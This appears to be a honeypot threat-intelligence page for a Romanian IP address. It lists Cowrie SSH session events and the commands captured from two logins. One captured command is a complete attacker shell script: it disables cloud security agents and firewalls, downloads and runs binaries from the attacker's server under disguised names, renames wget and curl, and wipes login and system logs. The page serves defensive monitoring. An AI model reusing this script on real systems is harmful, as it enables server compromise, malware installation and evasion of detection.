89.32.41.100
Location
🇷🇴 RO
ASN
AS48874 · Hostmaze Inc Srl-d
Cloud Provider
—
Total Events
36
Average by volume
Agent Count
2
First / Last Seen
2026-02-28 12:55 — 2026-02-28 12:57
Attack Types
External Corroboration
Not flagged by any external feeds
Campaigns
Multi-Agent Scan
Multi-Agent Scan
Multi-Agent Scan
Multi-Agent Scan
Multi-Agent Scan
Multi-Agent Scan
Multi-Agent Scan
Multi-Agent Scan
Multi-Agent Scan
Multi-Agent Scan
Multi-Agent Scan
Multi-Agent Scan
Session Forensics
Sessions
2 (2 with login)
Avg Depth Score
0.9
Commands Executed
8
Files Downloaded
0
Notable Commands
- #!/bin/sh; ; wdir="/tmp"; for i in "/tmp" "/var/tmp" "/dev/shm" "/usr" "/bin" "/home" "/root"; do; if [ -w "$i" ]; then; wdir="$i"; break; fi; done; cd "$wdir" || exit 1; ; ; systemctl stop YDService >/dev/null 2>&1; systemctl disable YDService >/dev/null 2>&1; systemctl stop tat_agent >/dev/null 2>&1; systemctl disable tat_agent >/dev/null 2>&1; ; ; systemctl mask YDService >/dev/null 2>&1; systemctl mask tat_agent >/dev/null 2>&1; ; ; systemctl daemon-reload; ; ; if command -v chattr >/dev/null 2>&1; then; chattr -R -i -a /usr/local/qcloud/ >/dev/null 2>&1; fi; ; ; pkill -9 YDService >/dev/null 2>&1; pkill -9 YDLive >/dev/null 2>&1; ; ; rm -rf /usr/local/qcloud/YunJing >/dev/null 2>&1; rm -rf /usr/local/qcloud/stargate >/dev/null 2>&1; rm -rf /usr/local/qcloud/monitor >/dev/null 2>&1; rm -rf /usr/local/qcloud/tat_agent >/dev/null 2>&1; ; mkdir -p /usr/local/qcloud/YunJing; mkdir -p /usr/local/qcloud/tat_agent; if command -v chattr >/dev/null 2>&1; then; chattr +i /usr/local/qcloud/YunJing; chattr +i /usr/local/qcloud/tat_agent; fi; ; ; ; disable_firewall() {; systemctl stop firewalld ufw >/dev/null 2>&1; systemctl disable firewalld ufw >/dev/null 2>&1; service firewalld stop >/dev/null 2>&1; service ufw stop >/dev/null 2>&1; ; if command -v iptables >/dev/null 2>&1; then; iptables -P INPUT ACCEPT >/dev/null 2>&1; iptables -P FORWARD ACCEPT >/dev/null 2>&1; iptables -P OUTPUT ACCEPT >/dev/null 2>&1; iptables -F >/dev/null 2>&1; iptables -X >/dev/null 2>&1; iptables -t nat -F >/dev/null 2>&1; iptables -t nat -X >/dev/null 2>&1; fi; }; disable_firewall; ; download_and_run() {; url="$1"; filename="$2"; ; if [ -f "./$filename" ] && [ -x "./$filename" ]; then; setsid "./$filename" >/dev/null 2>&1 &; return 0; fi; ; dl_bin=""; dl_args=""; ; if command -v good >/dev/null 2>&1; then; dl_bin="good"; dl_args="--no-check-certificate -q $url -O $filename"; elif command -v cool >/dev/null 2>&1; then; dl_bin="cool"; dl_args="-skL $url -o $filename"; elif command -v wget >/dev/null 2>&1; then; dl_bin="wget"; dl_args="--no-check-certificate -q $url -O $filename"; elif command -v curl >/dev/null 2>&1; then; dl_bin="curl"; dl_args="-skL $url -o $filename"; fi; ; if [ -z "$dl_bin" ]; then; apt-get update >/dev/null 2>&1 && apt-get install -y wget curl >/dev/null 2>&1; yum install -y wget curl >/dev/null 2>&1; if command -v wget >/dev/null 2>&1; then; dl_bin="wget"; dl_args="--no-check-certificate -q $url -O $filename"; fi; fi; ; if [ -n "$dl_bin" ]; then; $dl_bin $dl_args >/dev/null 2>&1; if [ -f "$filename" ]; then; chmod +x "$filename"; setsid "./$filename" >/dev/null 2>&1 &; fi; fi; }; ; lock_tools() {; command -v chattr >/dev/null 2>&1 && chattr -i /usr/bin/wget /usr/bin/curl >/dev/null 2>&1; ; w_path=$(which wget 2>/dev/null); if [ -n "$w_path" ]; then; case "$w_path" in; *good*) ;;; *) mv "$w_path" "$(dirname "$w_path")/good" >/dev/null 2>&1 ;;; esac; fi; ; c_path=$(which curl 2>/dev/null); if [ -n "$c_path" ]; then; case "$c_path" in; *cool*) ;;; *) mv "$c_path" "$(dirname "$c_path")/cool" >/dev/null 2>&1 ;;; esac; fi; }; ; SERVER_IP="89.32.41.100"; download_and_run "http://$SERVER_IP/vos.txt" "system_update"; download_and_run "http://$SERVER_IP/vox.txt" "network_conf"; ; lock_tools; ; cleanup() {; for log in /var/log/wtmp /var/log/btmp /var/log/lastlog /var/log/syslog /var/log/auth.log; do; if [ -f "$log" ]; then; echo > "$log" 2>/dev/null; fi; done; rm -f "$0"; }; cleanup; ; rm -- "$0"; rm -f /root/vos.sh; rm -f /tmp.vos.sh; exit 0
- /bin/skhqwensw
- /bin/skhqwensw
- ls -la /var/run/gcc.pid
Fingerprints
HASSH
SSH Client
Recent Events (last 50)
| Timestamp | Port | Proto | Event | Location |
|---|---|---|---|---|
| 2026-02-28 12:57:08 | :22 | ssh | cowrie.session.closed | sin |
| 2026-02-28 12:57:08 | :22 | ssh | cowrie.log.closed | sin |
| 2026-02-28 12:57:07 | :22 | ssh | cowrie.command.input | sin |
| 2026-02-28 12:57:07 | :22 | ssh | cowrie.session.params | sin |
| 2026-02-28 12:57:07 | :22 | ssh | cowrie.client.size | sin |
| 2026-02-28 12:57:07 | :22 | ssh | cowrie.log.closed | sin |
| 2026-02-28 12:57:06 | :22 | ssh | cowrie.command.failed | sin |
| 2026-02-28 12:57:06 | :22 | ssh | cowrie.command.input | sin |
| 2026-02-28 12:57:06 | :22 | ssh | cowrie.session.params | sin |
| 2026-02-28 12:57:06 | :22 | ssh | cowrie.client.size | sin |
| 2026-02-28 12:57:06 | :22 | ssh | cowrie.session.file_upload | sin |
| 2026-02-28 12:57:02 | :22 | ssh | cowrie.session.closed | sea |
| 2026-02-28 12:57:02 | :22 | ssh | cowrie.log.closed | sea |
| 2026-02-28 12:57:02 | :22 | ssh | cowrie.command.input | sea |
| 2026-02-28 12:57:02 | :22 | ssh | cowrie.session.params | sea |
| 2026-02-28 12:57:02 | :22 | ssh | cowrie.client.size | sea |
| 2026-02-28 12:57:01 | :22 | ssh | cowrie.log.closed | sea |
| 2026-02-28 12:57:01 | :22 | ssh | cowrie.command.failed | sea |
| 2026-02-28 12:57:01 | :22 | ssh | cowrie.command.input | sea |
| 2026-02-28 12:57:01 | :22 | ssh | cowrie.session.params | sea |
| 2026-02-28 12:57:01 | :22 | ssh | cowrie.client.size | sea |
| 2026-02-28 12:57:00 | :22 | ssh | cowrie.session.file_upload | sea |
| 2026-02-28 12:55:37 | :22 | ssh | cowrie.command.input | sea |
| 2026-02-28 12:55:37 | :22 | ssh | cowrie.session.params | sea |
| 2026-02-28 12:55:37 | :22 | ssh | cowrie.client.size | sea |
| 2026-02-28 12:55:37 | :22 | ssh | cowrie.login.success | sea |
| 2026-02-28 12:55:36 | :22 | ssh | cowrie.command.input | sin |
| 2026-02-28 12:55:36 | :22 | ssh | cowrie.session.params | sin |
| 2026-02-28 12:55:36 | :22 | ssh | cowrie.client.size | sin |
| 2026-02-28 12:55:36 | :22 | ssh | cowrie.client.kex | sea |
| 2026-02-28 12:55:36 | :22 | ssh | cowrie.login.success | sin |
| 2026-02-28 12:55:36 | :22 | ssh | cowrie.client.version | sea |
| 2026-02-28 12:55:36 | :22 | ssh | cowrie.session.connect | sea |
| 2026-02-28 12:55:35 | :22 | ssh | cowrie.client.kex | sin |
| 2026-02-28 12:55:34 | :22 | ssh | cowrie.client.version | sin |
| 2026-02-28 12:55:34 | :22 | ssh | cowrie.session.connect | sin |